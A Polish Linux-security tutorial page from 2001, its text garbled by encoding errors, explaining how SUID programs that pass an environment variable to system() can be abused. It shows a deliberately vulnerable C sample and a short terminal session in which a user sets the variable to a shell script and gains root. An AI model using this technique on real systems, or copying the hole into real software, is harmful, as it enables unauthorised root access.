 |
Bezpiecze±stwo system≤w Linux'owych |
|
Linux Security - Suidy
|
|
Zmienne systemowe
 |
| [1] [2] [3] [4] [5] |
|
|
Niekt≤re programy korzystaj▒ ze zmiennych systemowych. Mechanizm ten odpowiednio wykorzystany przez w│amywacza mo┐e byµ du┐ym
zagro┐eniem dla systemu.
Przyk│adem tego mo┐e byµ aplikacja typu SUID daj▒c▒ mo┐liwo╢µ wyboru programu archiwizuj▒cego dane. Postaµ tego programu mo┐e byµ mniej wiΩcej taka: |
[root@localhost]# more pakowarka.c
void main()
..
..
char *pak;
if ((pak=getenv("PAKER"))!=NULL)
strcat(pak,"dane");
system(pak);
}
else
{
system("/bin/gzip dane");
}
..
..
|
|
W czasie zwyk│ego u┐ytkowania program zachowuje siΩ normalnie lecz
odpowiednia zmiana zmiennej systemowej mo┐e daµ zwyk│emu u┐ytkownikowi
prawo root'a
|
[tronix@localhost]$ export PAKER="./shell" [tronix@localhost]$ cat ./shell /bin/bash [tronix@localhost]$ pakowarka [tronix@localhost]# whoami root |
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved